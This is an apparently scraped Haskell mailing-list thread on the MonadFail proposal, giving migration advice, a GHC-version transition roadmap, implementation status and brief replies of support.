7.16+ fail = Fail.fail #endif instance MonadFail Foo where fail = <...fail implementation...> ``` 2. Change your pattern to be irrefutable 3. Emulate the old behaviour by desugaring the pattern match by hand: ```haskell do Left e <- foobar stuff ``` becomes ```haskell do x <- foobar e <- case foobar of Left e' -> e' Right r -> error "Pattern match failed" -- Boooo stuff ``` The point is you'll have to do your dirty laundry yourself now if you have a value that *you* know will always match, and if you don't handle the other patterns you'll get incompleteness warnings, and the compiler won't silently eat those for you. - - Help! My code is broken because you removed `fail` from `Monad`, but my class defines it! *Delete that part of the instance definition.* Esimating the breakage - ---------------------- Using our initial implementation, I compiled stackage-nightly, and grepped the logs for found "invalid use of fail desugaring".][stackage-logs]. Search for "failable pattern" to find your way to the still pretty raw warnings. Transitional strategy - --------------------- The roadmap is similar to the [AMP][amp], the main difference being that since `MonadFail` does not exist yet, we have to introduce new functionality and then switch to it. * **GHC 7.12 / base-4.9** - Add module `Control.Monad.Fail` with new class `MonadFail(fail)` so people can start writing instances for it. `Control.Monad` only re-exports the class `MonadFail`, but not its `fail` method. NB: At this point, `Control.Monad.Fail.fail` clashes with `Prelude.fail` and `Control.Monad.fail`. - *(non-essential)* Add a language extension `-XMonadFail` that changes desugaring to use `MonadFail(fail)` instead of `Monad(fail)`. This has the effect that typechecking will infer a `MonadFail` constraint for `do` blocks with failable patterns, just as it is planned to do when the entire thing is done. - Warn when a `do`-block that contains a failable pattern is desugared, but there is no `MonadFail`-instance in scope: "Please add the instance or change your pattern matching." Add a flag to control whether this warning appears. - Warn when an instance implements the `fail` function (or when `fail` is imported as a method of `Monad`), as it will be removed from the `Monad` class in the future. (See also [GHC #10071][trac-10071]) 3. GHC 7.14 - Switch `-XMonadFail` on by default. - Remove the desugaring warnings. 3. GHC 7.16 - Remove `-XMonadFail`, leaving its effects on at all times. - Remove `fail` from `Monad`. - Instead, re-export `Control.Monad.Fail.fail` as `Prelude.fail` and `Control.Monad.fail`. - `Control.Monad.Fail` is now a redundant module that can be considered deprecated. Current status - -------------- - - [ZuriHac 2015 (29.5. - 31.5.)][zurihac]: Franz Thoma (@fmthoma) and me (David Luposchainsky aka @quchen) started implementing the MFP in GHC. - Desugaring to the new `fail` can be controlled via a new langauge extension, `MonadFailDesugaring`. - If the language extension is turned off, a warning will be emitted for code that would break if it was enabled. - Warnings are emitted for types that *have* a *MonadFail* instance. This still needs to be fixed. - The error message are readable, but should be more so. We're still on this. - - 2015-06-09: Estimated breakage by compiling Stackage. Smaller than expected. [amp]: <a href=" [stackage-logs" target="_blank"> [stackage-logs]: <a href=" [trac-10071" target="_blank"> [trac-10071]: [zurihac]: -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQEcBAEBAgAGBQJVd0/yAAoJELrQsaT5WQUshbUH/A3W0itVAk7ao8rtxId5unCJ 7StriKVkTyLAkkrbRJngM4MHEKiCsoyIgr8kBIwSHgk194GxeP2NCF4ijuBZoDBt +Uci+6BCBinV8+OzfrfTcJb4+8iw1j+eLWJ/Nz/JDMDNCiyzyC0SMsqGa+ssOz7H /2mqPkQjQgpHuP5PTRLHKPPIsayCQvTbZR1f14KhuMN2SPDE+WY4rqugu//XuIkN u1YssIf5l8mEez/1ljaqGL55cTI0UNg2z0iA0bFl/ajHaeQ6mc5BAevWfSohAMW7 7PIt13p9NIaMHnikmI+YJszm2IEaXuv47mGgbyDV//nHq3fwWN+naB+1mPX2eSU= =vPAL -----END PGP SIGNATURE----- _______________________________________________ Libraries mailing list [hidden email] -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On 10.06.2015 00:26, Johan Tibell wrote: > ? I don't have hard evidence, but the Monad class being partial strikes me as pretty backwards in a language where totality and no implicit failures are important to the programmers. We try our best to advocate not using certain functions like "head" carelessly, but do-notation comes with similar partiality. One concrete example that I know is bimap, but that's something I stumbled upon months ago by accident. Another is that Binary does not have a monomorphic "fail" function and it hurts me a bit to use the Monad-"fail" and write a comment on how that is safe to do in the current context. I think there are two important consequences of MonadFail. First of all, we can all safely write failable patterns if we so desire. Second, the compiler can ensure other people's codebases do not lie to us (knowingly or unknowingly). David/quchen -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQEcBAEBAgAGBQJVd2vEAAoJELrQsaT5WQUs+m8IAOWA9Hd52MG1wZ6g6FoOcXd6 x64dRDlilmkVu2IRxHADzip75Oji254yKQ5VY9yMGjYpFajtgf0Q8LrmA0ePTzhg E/oxdm1vyRoJab1C5TfdrzPM/voP+wHi7y2ak1j0hTNky+wETj4MKtJ/Jef225nd APUq05t6nPwzEDCz37RitfbA6/nwwYShaVjNe0tRluPrJuxdBu0+aobFc2lzVL+s J7egnV1kqEOhc7INOhWYsvAJPAJSiY950y/Nmxb2/r5orTfN3tsr98d1zwRxhCmq UNXhUaj5xD7BK2Rn1Zy7VwUv1T8IRLZuOQrlZh3HWz4t1SI0tTu3tdS468s/B1g= =4mEU -----END PGP SIGNATURE----- _______________________________________________ Libraries mailing list [hidden email] Thanks for putting this together.The proposal says:? _______________________________________________ ghc-devs mailing list [hidden email] On 06/09/2015 10:43 PM, David Luposchainsky wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > +1 _______________________________________________ Libraries mailing list [hidden email] i'll add my token +1 to the land slideOn Tue, Jun 9, 2015 at 11:19 PM, Bardur Arantsson <[hidden email]> wrote:On 06/09/2015 10:43 PM, David Luposchainsky wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > +1 _______________________________________________ Libraries mailing list [hidden email] _______________________________________________ Libraries mailing list [hidden email]
http://haskell.1045720.n5.nabble.com/MonadFail-proposal-MFP-Moving-fail-out-of-Monad-td5810937.html
CC-MAIN-2019-47
refinedweb
1,807
56.15